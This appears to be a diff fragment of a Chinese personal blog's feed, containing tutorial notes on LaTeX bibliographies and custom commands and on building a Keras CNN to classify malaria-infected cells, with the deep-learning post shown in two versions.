    \begin{thebibliography}{99}  % 这个数字99 指的是参考文献的项目按照数字进行编号, 并且最多为99个, 如果你有更多的项目, 把这个数字改大一点就行了
    \bibitem[记号]{引用标志}文献条目1
    \bibitem[记号]{引用标志}文献条目2
    ...
    \end{thebibliography}

    其中文献条目包括:作者,题目,出版社,年代,版本,页码等。

    引用时可以采用:\cite{引用标志1, 引用标志2, ...}


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    \documentclass{ctexart}

    \begin{document}
    引用一篇文章\cite{article1} 引用一本书\cite{book1}等

    \begin{thebibliography}{99}
    \bibitem{article1}陈立辉,苏伟,蔡川,陈晓云.
    \emph{基于 LaTex 的 web 数学公式提取方法研究}[J]。计算机科学。2014(06)

    \bibitem{book1}william H.Press,Saul A. Teukolsky,William T. Vetterling,Brian P.Elannery,
    \emph{Numerical Recipes js Edition:
    The Art of Scientific Computing}
    Cambridge University Press, New York,2007.

    \bibitem{latexGuide} Kopka Helmut, w.Daly Patrick,
    \emph{Guide to \LaTeX}, $4^{th}$ Edition.
    Available at \texttt{http://www.amazon.com}.

    \bibitem{latexMath} Graetzer George, \emph{Math Into \LaTeX},
    BirkhAauser Boston; 3 edition (June 22, 2000).
    \end{thebibliography}
    \end{document}

    使用 BibTeX

    test.bib文件中输入如下内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    @book{mittelbach2004,
    title = {The {{\LaTex}} Companion},
    publisher = {Addison-wesley},
    year = {2004},
    author = {Frank Mittelbach and Michel Goossens},
    series = {Tools and Techniques for Computer Typesetting},
    address = {Boston},
    edition = {Second}
    }

    需要多次编译:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    \documentclass{ctexart}

    \bibliographystyle{plain} % 可选选项 plain unsrt alpha abbrv

    \begin{document}
    这是一个参考文献的引用:\cite{mittelbach2004}
    \bibliography{test}
    \end{document}
    • 使用\bibliography{test}以引用test.bib
    • 使用\cite{mittelbach2004}引用mittelbach2004

    使用google学术百度学术等获得bib格式文件:

    png

    • 使用\noctite{*}在参考文献中显示正文中未引用的文献。

    • 使用zotero从网站中批量获取文献的BibTeX

    • 使用JabRef管理参考文献中的.bib文件。

    png

    P14_latex14-LaTeX中的参考文献BibLaTeX

    • biblatex/biber新的 $\TeX$ 参考文献排版引擎。

    • 样式文件(参考文献样式文件–bbx文件,引用样式文件–cbx文件)使用 $\LaTeX$ 编写。

    • 支持根据本地化排版,如:

      • biber -l zh__pinyin texfile,用于指定按拼音排序
      • biber -l zh__stroke texfile,用于按笔画排序

    试不出来orz…可能是bib文件本身有问题?

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    \documentclass{ctexart}

    \usepackage[style=caspervector,
    backend=biber,utf8,sorting=ecnty]{biblatex}

    \addbibresource{test.bib}

    \begin{document}
    % 一次管理,多次应用
    无格式化引用 \cite{2016An}

    带方括号的引用 \parencite{2016Analyzing}

    上标引用 \supercite{mittelbach2004}

    \printbibliography[title = {参考文献}] % 修改标题,默认为 References
    \end{document}

    P15_latex15-LaTeX中的自定义命令和环境

    • \newcommand定义命令
    • 命令只能由字母组成,不能以\end开头
    • \newcommand<命令>[<参数个数>][<首参数默认值>]{<具体定义>}

    ​ 定义命令和环境是进行$\LaTeX$格式定制、达成内容与格式分离目标的利器。使用自定义的命令和环境把字体、字号、缩进、对齐、间距等各种琐细的内容包装起来,赋以一个有意义的名字,可以使文挡结构清晰、代码整洁、易于维护。

    ​ 在使用宏定义的功能时,要综合利用各种已有的命令、环境、变量等功能,事实上,前面所介绍的长度变量与盒子、字体字号等内容,大多并不直接出现在文档正文中,而主要都是用在实现各种结构化的宏定义里。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    \documentclass{ctexart}

    % \newcommand 可以是简单的字符串替换,例如:
    % 使用 \PRC 相当于 People's Republic of \emph{China} 这一串内容
    \newcommand\PRC{People's Republic of \emph{China}}

    % \newcommand 也可以使用参数
    % 参数个数可以从 1 到 9,使用时用 #1, #2, ..., #9 表示
    \newcommand\loves[2]{#1 喜欢 #2}
    \newcommand\hatedby[2]{#2 不受 #1 喜欢}

    % \newcommand 的参数也可以有默认值
    % 指定参数个数的同时指定了首个参数的默认值,那么这个命令的
    % 第一个参数就成为可选的参数(要使用中括号指定)
    \newcommand\love[3][喜欢]{#2 #1 #3}

    % \renewcommand-重定义命令
    % 与 \newcommand 命令作用和用法相同,但只能用于已有命令
    % \renewcommand<命令>[<参数个数>][<首参数默认值>]{<具体定义>}
    \renewcommand\abstractname{内容简介}

    % 定义和重定义环境
    % \newenvironment<环境名称>}[<参数个数>][<首参数默认值>]
    % <环境前定义>
    % <环境后定义>
    % renewenvironment{<环境名称>}[<参数个数>][<首参数默认值>]
    % {<环境前定义>}
    % {<环境后定义>}

    % 为 book 类中定义摘要(abstract)环境
    \newenvironment{myabstract}[1][摘要]%
    {\small
    \begin{center}\bfseries #1\end{center}%
    \begin{quotation}}%
    {\end{quotation}}

    % 环境参数只有<环境前定义>中可以使用参数,
    % <环境后定义>中不能再使用环境参数。
    % 如果需要,可以先把前面得到的参数保存在一个命令中,在后面使用:
    \newenvironment{Quotation}[1]%
    {\newcommand\quotesource{#1}%
    \begin{quotation}}
    {\par\hfill---《\textit{\quotesource}》
    \end{quotation}}

    \begin{document}

    \PRC

    \loves{猫儿}{鱼}

    \hatedby{猫儿}{萝卜}

    \love{猫儿}{鱼}

    \love[最爱]{猫儿}{鱼}

    \begin{abstract}
    这是一段摘要...
    \end{abstract}

    \begin{myabstract}
    这是一段自定义摘要...
    \end{myabstract}

    \begin{Quotation}{易$\cdot$乾}
    初九,潜龙勿用。
    \end{Quotation}

    \end{document}
    ]]>
    @@ -8633,7 +8633,7 @@ /posts/Diary-%E7%BB%93%E6%9D%9F%E4%BA%86%E7%96%AB%E5%BE%80%E6%83%85%E6%B7%B1%E7%9A%842022/ -
    ]]>
    +
    ]]>
    @@ -8687,7 +8687,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(70-71)-Deep%20Learning/ - 正文

    70 - An overview of deep learning and neural networks

    png

    传统的机器学习:提取特征然后生成模型

    png

    CNN 深度卷积网络:输入-卷积层-池化层-全连接层

    png

    卷积层和池化层可以有很多层。

    png

    INPUT_SHAPE =(64,64,3) #change to (SIZE, SIZE, 3)
    inp = keras.layersInput(shape=INPUT SHAPE)
    conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(inp)
    pool1 = keras.layers.MaxPooling2D(pool size=(2, 2))(conv1)
    norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
    drop1 = keras.layers.Dropout(rate=0.2)(norm1)
    conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(drop1)
    pool2 = keras.layers.MaxPooling2D(poo size=(2, 2))(conv2)
    norm2 = keras.layers.BatchNormalization(axis = -1)(pool2)
    drop2 = keras.layers.Dropout(rate=0.2)(norm2)
    flat = keras.layers.Flatten()(drop2)
    hidden1 = keras.layers.Dense(512, activation='relu')(flat)
    norm3 = keras.layers.BatchNormalization(axis = -1)(hidden1)
    drop3 = keras.layers.Dropout(rate=0.2)(norm3)
    hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
    norm4 = keras.layers.BatchNormalization(axis = -1)(hidden2)
    drop4 = keras.layers.Dropout(rate=0.2)(norm4)

    out = keras.layers.Dense(2, activation='sigmoid')(drop4) # units=1gives error
    model = keras.Model(inputs=inp, outputs=out)model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

    A few keywords to understand:

    png

    TensorFlow and Keras

    • TensorFlow
      • TensorFlow is the most famous library used in production for deep learning models.
      • TensorFlow is not that easy to use.
    • Keras
      • Keras is a high level API built on TensorFlow (also on Theano)
      • Keras is more user-friendly than TensorFlow -allows you to quickly build and test networks with minimal effort.

    png

    • 卷积和池化

    png

    BatchNormalization

    • Normalization is important to keep the values in input and hidden layers within certain range.
    • Normalizing usually improves training speed.
    • Batch normalization allows each layer of a network to learn by itself a little bit more independently of other layers.
    • We can use higher learning rates because batch normalization makes sure that there’s noactivation that’s gone really high or really low.

    png

    Dropout(通常是将权重设为 0)

    • The term “dropout” refers to dropping out neurons at random in a neural network.
    • Dropout is needed to prevent over-fitting.

    png

    Flattening

    • The flattening step creates a long vector that is needed as input to the artificial neural network.

    png

    Dense layer

    • Input (features)
    • Hidden Layers (lots of layers ~ “deep learning”)
      • neuron (Weight, bias and activation function)
    • Output (prediction)

    png

    Activation: Biological Neuron reference 参考生物的神经元

    png

    png

    Optimizer:Adam

    • Optimizer → choice of optimizer algorithm → good results in minutes or hours or days.

      • 优化器 → 优化器算法的选择 → 在几分钟或几小时或几天内取得好的结果。
    • Adam optimization is an extension to stochastic gradient descent.

      • Adam 优化是对随机梯度下降的延伸。
    • Adam is most often used for CNN.

    png

    Loss Functions - Categorical cross-entropy 交叉熵损失函数

    • A loss function (or cost function) is a method of evaluating how well your algorithm models your dataset.
    • Good prediction → low value for loss (Bad → high loss value)
    • Cross-entropy loss function is commonly used for CNN.
    • Mean square error is an example of basic loss function for linear regression.

    png

    Epoch and other terms

    • When data is too big we need to break into smaller batches so the computer can handle.

    • One epoch is when an ENTIRE dataset is passed forward and backward through the neural network ONCE.

      • 一个 epoch 是指一个完整的数据集通过神经网络向前和向后传递一次。
    • Batch Size is the number of training samples in 1 Forward/1 Backward pass.

      • Batch Size 是指 1 个前向 / 1 个后向通道中的训练样本数。
    • Number of iterations = Number of passes

      • 迭代次数 = 通过次数
    • Example : lf we have 100 training samples and Batch size is set to 25, it will take 4 iterations to complete 1 Epoch.

      • 例子:如果我们有 100 个训练样本,批量大小设置为 25,则需要 4 次迭代来完成一个周期。

    What is the right numbers of epochs?

    No one knows, depends on the problem!

    71 - Malarial cell classification using CNN

    import numpy as np
    import cv2
    import os
    from PIL import Image
    import keras

    np.random.seed(1000)
    os.environ['KERAS_BACKEND'] = 'tensorflow' # 将后端设为 tensorflow,如果你想,也可设成 theano

    • 尝试导入输入(500 个未收感染的细胞,500 个被感染的细胞)
    image_directory = 'cell_images2/'
    SIZE = 64
    dataset = []
    label = []
    • 导入被感染的细胞,设为标签0
    parasitized_images = os.listdir(image_directory + 'Parasitized/')
    for i, image_name in enumerate(parasitized_images):
    if image_name.split('.')[1] == 'png': # 如果是 PNG 格式,则读取它
    image = cv2.imread(image_directory + 'Parasitized/' + image_name) # 读取图片,以 np.array格式
    image = Image.fromarray(image, 'RGB') # 将 array 格式转换为 image 格式
    image = image.resize((SIZE, SIZE)) # 变换大小
    dataset.append(np.array(image)) # 录入数据集
    label.append(0) # 录入标签
    • 导入未被感染的细胞,设为标签1
    uninfected_images = os.listdir(image_directory + 'Uninfected/')
    for i, image_name in enumerate(uninfected_images):
    if image_name.split('.')[1] == 'png':
    image = cv2.imread(image_directory + 'Uninfected/' + image_name)
    image = Image.fromarray(image, 'RGB')
    image = image.resize((SIZE, SIZE))
    dataset.append(np.array(image))
    label.append(1)

    • 设置 CNN

      • 2 conv and pool layers. with some normalization and drops in between.
    • 输入层

    INPUT_SHAPE = (SIZE, SIZE, 3)
    inp = keras.layers.Input(shape=INPUT_SHAPE)
    conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3),
    activation='relu', padding='same')(inp)
    pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
    norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
    drop1 = keras.layers.Dropout(rate=0.2)(norm1)
    • 卷积层 2
    conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3),
    activation='relu', padding='same')(drop1)
    • 池化层 2
    pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
    • Normalization 2
    norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
    • Dropout 2
    drop2 = keras.layers.Dropout(rate=0.2)(norm2)
    • Flatten 层 Flatten layer
      • Flatten the matrix to get it ready for dense.
    flat = keras.layers.Flatten()(drop2)
    hidden1 = keras.layers.Dense(512, activation='relu')(flat)
    • Normalization 3
    norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
    • Dropout 3
    drop3 = keras.layers.Dropout(rate=0.2)(norm3)
    • 隐藏层 2
    hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
    • Normalization 4
    norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
    • Drop 4
    drop4 = keras.layers.Dropout(rate=0.2)(norm4)
    • 输出层
    out = keras.layers.Dense(2, activation='sigmoid')(drop4)
    model = keras.Model(inputs=inp, outputs=out)
    model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
    from tensorflow.keras import utils
    from keras.utils.vis_utils import model_to_dot

    utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)

    png

    model.summary()
    Model: "model"_________________________________________________________________ Layer (type)                Output Shape              Param #   ================================================================= input_1 (InputLayer)        [(None, 64, 64, 3)]       0                                                                           conv2d (Conv2D)             (None, 64, 64, 32)        896                                                                         max_pooling2d (MaxPooling2D  (None, 32, 32, 32)       0          )                                                                                                                                 batch_normalization (BatchN  (None, 32, 32, 32)       128        ormalization)                                                                                                                     dropout (Dropout)           (None, 32, 32, 32)        0                                                                           conv2d_1 (Conv2D)           (None, 32, 32, 32)        9248                                                                        max_pooling2d_1 (MaxPooling  (None, 16, 16, 32)       0          2D)                                                                                                                               batch_normalization_1 (Batc  (None, 16, 16, 32)       128        hNormalization)                                                                                                                   dropout_1 (Dropout)         (None, 16, 16, 32)        0                                                                           flatten (Flatten)           (None, 8192)              0                                                                           dense (Dense)               (None, 512)               4194816                                                                     batch_normalization_2 (Batc  (None, 512)              2048       hNormalization)                                                                                                                   dropout_2 (Dropout)         (None, 512)               0                                                                           dense_1 (Dense)             (None, 256)               131328                                                                      batch_normalization_3 (Batc  (None, 256)              1024       hNormalization)                                                                                                                   dropout_3 (Dropout)         (None, 256)               0                                                                           dense_2 (Dense)             (None, 2)                 514                                                                        =================================================================Total params: 4,340,130Trainable params: 4,338,466Non-trainable params: 1,664_________________________________________________________________

    卷积神经网络的参数计算_qian99的博客-CSDN博客_卷积神经网络参数

    网络层(输入)输入神经元个数sizestride输出参数量
    input64x64x3(长 x 宽 x 通道数)64x64x30
    conv2d64x64x3323x3164x64x3232x3x3x3+32=896
    max_pooling2d64x64x322x2None(64/2)x(64/2)x320
    batch_normalization32x32x3232x32x32128
    dropout32x32x3232x32x320
    conv2d_132x32x32323x3132x32x3232x3x3x32+32=9248
    max_pooling2d_132x32x322x21(32/2)x(32/2)x320
    batch_normalization_116x16x3216x16x32128
    dropout_116x16x3216x16x320
    flatten16x16x3216x16x32=81920
    dense81925125128192x512+512=4194816
    batch_normalization_25125122048
    dropout_25125120
    dense_1512256256512x256+256=131328
    batch_normalization_32562561024
    dropout_32562560
    dense_225622256x2+2=514

    • 设置测试集和训练集,开始训练
    from sklearn.model_selection import train_test_split
    from keras.utils import to_categorical

    X_train, X_test, y_train, y_test = train_test_split(dataset,
    to_categorical(np.array(label)),
    test_size = 0.20,
    random_state = 0)
    history = model.fit(np.array(X_train), y_train, batch_size=64, verbose=1, epochs=25, validation_split=0.1, shuffle=False)
    Epoch 1/2512/12 [==============================] - 9s 99ms/step - loss: 0.9405 - accuracy: 0.6444 - val_loss: 31.2568 - val_accuracy: 0.5625Epoch 2/2512/12 [==============================] - 0s 37ms/step - loss: 0.5048 - accuracy: 0.7472 - val_loss: 23.6857 - val_accuracy: 0.5625Epoch 3/2512/12 [==============================] - 0s 37ms/step - loss: 0.3281 - accuracy: 0.8417 - val_loss: 17.8224 - val_accuracy: 0.5625Epoch 4/2512/12 [==============================] - 0s 37ms/step - loss: 0.2036 - accuracy: 0.9250 - val_loss: 14.3039 - val_accuracy: 0.5625Epoch 5/2512/12 [==============================] - 0s 37ms/step - loss: 0.1568 - accuracy: 0.9431 - val_loss: 13.0039 - val_accuracy: 0.5625Epoch 6/2512/12 [==============================] - 0s 37ms/step - loss: 0.1074 - accuracy: 0.9694 - val_loss: 7.4553 - val_accuracy: 0.5625Epoch 7/2512/12 [==============================] - 0s 37ms/step - loss: 0.0858 - accuracy: 0.9778 - val_loss: 3.5444 - val_accuracy: 0.5500Epoch 8/2512/12 [==============================] - 0s 37ms/step - loss: 0.0608 - accuracy: 0.9819 - val_loss: 4.7493 - val_accuracy: 0.5500Epoch 9/2512/12 [==============================] - 0s 37ms/step - loss: 0.0632 - accuracy: 0.9764 - val_loss: 4.7916 - val_accuracy: 0.5625Epoch 10/2512/12 [==============================] - 0s 36ms/step - loss: 0.0432 - accuracy: 0.9889 - val_loss: 1.9020 - val_accuracy: 0.5875Epoch 11/2512/12 [==============================] - 0s 36ms/step - loss: 0.0489 - accuracy: 0.9847 - val_loss: 2.2950 - val_accuracy: 0.5750Epoch 12/2512/12 [==============================] - 0s 37ms/step - loss: 0.0458 - accuracy: 0.9861 - val_loss: 0.8035 - val_accuracy: 0.7625Epoch 13/2512/12 [==============================] - 0s 38ms/step - loss: 0.0264 - accuracy: 0.9958 - val_loss: 1.4798 - val_accuracy: 0.6500Epoch 14/2512/12 [==============================] - 0s 38ms/step - loss: 0.0244 - accuracy: 0.9931 - val_loss: 1.6248 - val_accuracy: 0.6625Epoch 15/2512/12 [==============================] - 0s 38ms/step - loss: 0.0160 - accuracy: 0.9958 - val_loss: 1.2913 - val_accuracy: 0.7125Epoch 16/2512/12 [==============================] - 0s 39ms/step - loss: 0.0169 - accuracy: 0.9958 - val_loss: 1.4256 - val_accuracy: 0.6875Epoch 17/2512/12 [==============================] - 0s 40ms/step - loss: 0.0114 - accuracy: 0.9986 - val_loss: 1.2699 - val_accuracy: 0.7000Epoch 18/2512/12 [==============================] - 0s 39ms/step - loss: 0.0158 - accuracy: 0.9972 - val_loss: 0.7563 - val_accuracy: 0.7875Epoch 19/2512/12 [==============================] - 0s 39ms/step - loss: 0.0133 - accuracy: 0.9972 - val_loss: 0.6219 - val_accuracy: 0.8500Epoch 20/2512/12 [==============================] - 0s 38ms/step - loss: 0.0194 - accuracy: 0.9958 - val_loss: 0.7935 - val_accuracy: 0.8500Epoch 21/2512/12 [==============================] - 0s 38ms/step - loss: 0.0174 - accuracy: 0.9972 - val_loss: 2.8081 - val_accuracy: 0.5625Epoch 22/2512/12 [==============================] - 0s 38ms/step - loss: 0.0188 - accuracy: 0.9931 - val_loss: 0.6510 - val_accuracy: 0.8000Epoch 23/2512/12 [==============================] - 0s 38ms/step - loss: 0.0340 - accuracy: 0.9903 - val_loss: 1.6654 - val_accuracy: 0.6250Epoch 24/2512/12 [==============================] - 0s 38ms/step - loss: 0.0248 - accuracy: 0.9931 - val_loss: 0.8992 - val_accuracy: 0.7625Epoch 25/2512/12 [==============================] - 0s 38ms/step - loss: 0.0201 - accuracy: 0.9917 - val_loss: 2.0561 - val_accuracy: 0.7250

    • 查看结果
    print("Test_Accuracy: {:.2f}%".format(model.evaluate(np.array(X_test), np.array(y_test))[1]*100))
    7/7 [==============================] - 0s 17ms/step - loss: 1.7793 - accuracy: 0.6950Test_Accuracy: 69.50%
    import matplotlib.pyplot as plt

    f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
    t = f.suptitle('CNN Performance', fontsize=12)
    f.subplots_adjust(top=0.85, wspace=0.3)

    # 绘制训练 & 验证的准确率值
    max_epoch = len(history.history['accuracy'])+1
    epoch_list = list(range(1,max_epoch))
    ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy')
    ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy')
    ax1.set_xticks(np.arange(1, max_epoch, 5))
    ax1.set_ylabel('Accuracy Value')
    ax1.set_xlabel('Epoch')
    ax1.set_title('Accuracy')
    l1 = ax1.legend(loc="best")

    # 绘制训练 & 验证的损失值
    ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
    ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
    ax2.set_xticks(np.arange(1, max_epoch, 5))
    ax2.set_ylabel('Loss Value')
    ax2.set_xlabel('Epoch')
    ax2.set_title('Loss')
    l2 = ax2.legend(loc="best")

    png

    可以推断出 epoch 次数过多,出现了过拟合现象。


    • 保存模型
    model.save('malaria_cnn.h5')

    png

    ]]>
    + 正文

    70 - An overview of deep learning and neural networks

    png

    传统的机器学习:提取特征然后生成模型

    png

    CNN 深度卷积网络:输入-卷积层-池化层-全连接层

    png

    卷积层和池化层可以有很多层。

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    INPUT_SHAPE =(64,64,3) #change to (SIZE, SIZE, 3)
    inp = keras.layersInput(shape=INPUT SHAPE)
    conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(inp)
    pool1 = keras.layers.MaxPooling2D(pool size=(2, 2))(conv1)
    norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
    drop1 = keras.layers.Dropout(rate=0.2)(norm1)
    conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(drop1)
    pool2 = keras.layers.MaxPooling2D(poo size=(2, 2))(conv2)
    norm2 = keras.layers.BatchNormalization(axis = -1)(pool2)
    drop2 = keras.layers.Dropout(rate=0.2)(norm2)
    flat = keras.layers.Flatten()(drop2)
    hidden1 = keras.layers.Dense(512, activation='relu')(flat)
    norm3 = keras.layers.BatchNormalization(axis = -1)(hidden1)
    drop3 = keras.layers.Dropout(rate=0.2)(norm3)
    hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
    norm4 = keras.layers.BatchNormalization(axis = -1)(hidden2)
    drop4 = keras.layers.Dropout(rate=0.2)(norm4)

    out = keras.layers.Dense(2, activation='sigmoid')(drop4) # units=1gives error
    model = keras.Model(inputs=inp, outputs=out)model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

    A few keywords to understand:

    png

    TensorFlow and Keras

    • TensorFlow
      • TensorFlow is the most famous library used in production for deep learning models.
      • TensorFlow is not that easy to use.
    • Keras
      • Keras is a high level API built on TensorFlow (also on Theano)
      • Keras is more user-friendly than TensorFlow -allows you to quickly build and test networks with minimal effort.

    png

    • 卷积和池化

    png

    BatchNormalization

    • Normalization is important to keep the values in input and hidden layers within certain range.
    • Normalizing usually improves training speed.
    • Batch normalization allows each layer of a network to learn by itself a little bit more independently of other layers.
    • We can use higher learning rates because batch normalization makes sure that there’s noactivation that’s gone really high or really low.

    png

    Dropout(通常是将权重设为 0)

    • The term “dropout” refers to dropping out neurons at random in a neural network.
    • Dropout is needed to prevent over-fitting.

    png

    Flattening

    • The flattening step creates a long vector that is needed as input to the artificial neural network.

    png

    Dense layer

    • Input (features)
    • Hidden Layers (lots of layers ~ “deep learning”)
      • neuron (Weight, bias and activation function)
    • Output (prediction)

    png

    Activation: Biological Neuron reference 参考生物的神经元

    png

    png

    Optimizer:Adam

    • Optimizer → choice of optimizer algorithm → good results in minutes or hours or days.

      • 优化器 → 优化器算法的选择 → 在几分钟或几小时或几天内取得好的结果。
    • Adam optimization is an extension to stochastic gradient descent.

      • Adam 优化是对随机梯度下降的延伸。
    • Adam is most often used for CNN.

    png

    Loss Functions - Categorical cross-entropy 交叉熵损失函数

    • A loss function (or cost function) is a method of evaluating how well your algorithm models your dataset.
    • Good prediction → low value for loss (Bad → high loss value)
    • Cross-entropy loss function is commonly used for CNN.
    • Mean square error is an example of basic loss function for linear regression.

    png

    Epoch and other terms

    • When data is too big we need to break into smaller batches so the computer can handle.

    • One epoch is when an ENTIRE dataset is passed forward and backward through the neural network ONCE.

      • 一个 epoch 是指一个完整的数据集通过神经网络向前和向后传递一次。
    • Batch Size is the number of training samples in 1 Forward/1 Backward pass.

      • Batch Size 是指 1 个前向 / 1 个后向通道中的训练样本数。
    • Number of iterations = Number of passes

      • 迭代次数 = 通过次数
    • Example : lf we have 100 training samples and Batch size is set to 25, it will take 4 iterations to complete 1 Epoch.

      • 例子:如果我们有 100 个训练样本,批量大小设置为 25,则需要 4 次迭代来完成一个周期。

    What is the right numbers of epochs?

    No one knows, depends on the problem!

    71 - Malarial cell classification using CNN

    1
    2
    3
    4
    5
    6
    7
    8
    import numpy as np
    import cv2
    import os
    from PIL import Image
    import keras

    np.random.seed(1000)
    os.environ['KERAS_BACKEND'] = 'tensorflow' # 将后端设为 tensorflow,如果你想,也可设成 theano

    • 尝试导入输入(500 个未收感染的细胞,500 个被感染的细胞)
    1
    2
    3
    4
    image_directory = 'cell_images2/'
    SIZE = 64
    dataset = []
    label = []
    • 导入被感染的细胞,设为标签0
    1
    2
    3
    4
    5
    6
    7
    8
    parasitized_images = os.listdir(image_directory + 'Parasitized/')
    for i, image_name in enumerate(parasitized_images):
    if image_name.split('.')[1] == 'png': # 如果是 PNG 格式,则读取它
    image = cv2.imread(image_directory + 'Parasitized/' + image_name) # 读取图片,以 np.array格式
    image = Image.fromarray(image, 'RGB') # 将 array 格式转换为 image 格式
    image = image.resize((SIZE, SIZE)) # 变换大小
    dataset.append(np.array(image)) # 录入数据集
    label.append(0) # 录入标签
    • 导入未被感染的细胞,设为标签1
    1
    2
    3
    4
    5
    6
    7
    8
    uninfected_images = os.listdir(image_directory + 'Uninfected/')
    for i, image_name in enumerate(uninfected_images):
    if image_name.split('.')[1] == 'png':
    image = cv2.imread(image_directory + 'Uninfected/' + image_name)
    image = Image.fromarray(image, 'RGB')
    image = image.resize((SIZE, SIZE))
    dataset.append(np.array(image))
    label.append(1)

    • 设置 CNN

      • 2 conv and pool layers. with some normalization and drops in between.
    • 输入层

    1
    2
    INPUT_SHAPE = (SIZE, SIZE, 3)
    inp = keras.layers.Input(shape=INPUT_SHAPE)
    1
    2
    conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3),
    activation='relu', padding='same')(inp)
    1
    pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
    1
    norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
    1
    drop1 = keras.layers.Dropout(rate=0.2)(norm1)
    • 卷积层 2
    1
    2
    conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3),
    activation='relu', padding='same')(drop1)
    • 池化层 2
    1
    pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
    • Normalization 2
    1
    norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
    • Dropout 2
    1
    drop2 = keras.layers.Dropout(rate=0.2)(norm2)
    • Flatten 层 Flatten layer
      • Flatten the matrix to get it ready for dense.
    1
    flat = keras.layers.Flatten()(drop2)
    1
    hidden1 = keras.layers.Dense(512, activation='relu')(flat)
    • Normalization 3
    1
    norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
    • Dropout 3
    1
    drop3 = keras.layers.Dropout(rate=0.2)(norm3)
    • 隐藏层 2
    1
    hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
    • Normalization 4
    1
    norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
    • Drop 4
    1
    drop4 = keras.layers.Dropout(rate=0.2)(norm4)
    • 输出层
    1
    out = keras.layers.Dense(2, activation='sigmoid')(drop4)
    1
    2
    model = keras.Model(inputs=inp, outputs=out)
    model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
    1
    2
    3
    4
    from tensorflow.keras import utils
    from keras.utils.vis_utils import model_to_dot

    utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)

    png

    1
    model.summary()
    Model: "model"_________________________________________________________________ Layer (type)                Output Shape              Param #   ================================================================= input_1 (InputLayer)        [(None, 64, 64, 3)]       0                                                                           conv2d (Conv2D)             (None, 64, 64, 32)        896                                                                         max_pooling2d (MaxPooling2D  (None, 32, 32, 32)       0          )                                                                                                                                 batch_normalization (BatchN  (None, 32, 32, 32)       128        ormalization)                                                                                                                     dropout (Dropout)           (None, 32, 32, 32)        0                                                                           conv2d_1 (Conv2D)           (None, 32, 32, 32)        9248                                                                        max_pooling2d_1 (MaxPooling  (None, 16, 16, 32)       0          2D)                                                                                                                               batch_normalization_1 (Batc  (None, 16, 16, 32)       128        hNormalization)                                                                                                                   dropout_1 (Dropout)         (None, 16, 16, 32)        0                                                                           flatten (Flatten)           (None, 8192)              0                                                                           dense (Dense)               (None, 512)               4194816                                                                     batch_normalization_2 (Batc  (None, 512)              2048       hNormalization)                                                                                                                   dropout_2 (Dropout)         (None, 512)               0                                                                           dense_1 (Dense)             (None, 256)               131328                                                                      batch_normalization_3 (Batc  (None, 256)              1024       hNormalization)                                                                                                                   dropout_3 (Dropout)         (None, 256)               0                                                                           dense_2 (Dense)             (None, 2)                 514                                                                        =================================================================Total params: 4,340,130Trainable params: 4,338,466Non-trainable params: 1,664_________________________________________________________________

    卷积神经网络的参数计算_qian99的博客-CSDN博客_卷积神经网络参数

    网络层(输入)输入神经元个数sizestride输出参数量
    input64x64x3(长 x 宽 x 通道数)64x64x30
    conv2d64x64x3323x3164x64x3232x3x3x3+32=896
    max_pooling2d64x64x322x2None(64/2)x(64/2)x320
    batch_normalization32x32x3232x32x32128
    dropout32x32x3232x32x320
    conv2d_132x32x32323x3132x32x3232x3x3x32+32=9248
    max_pooling2d_132x32x322x21(32/2)x(32/2)x320
    batch_normalization_116x16x3216x16x32128
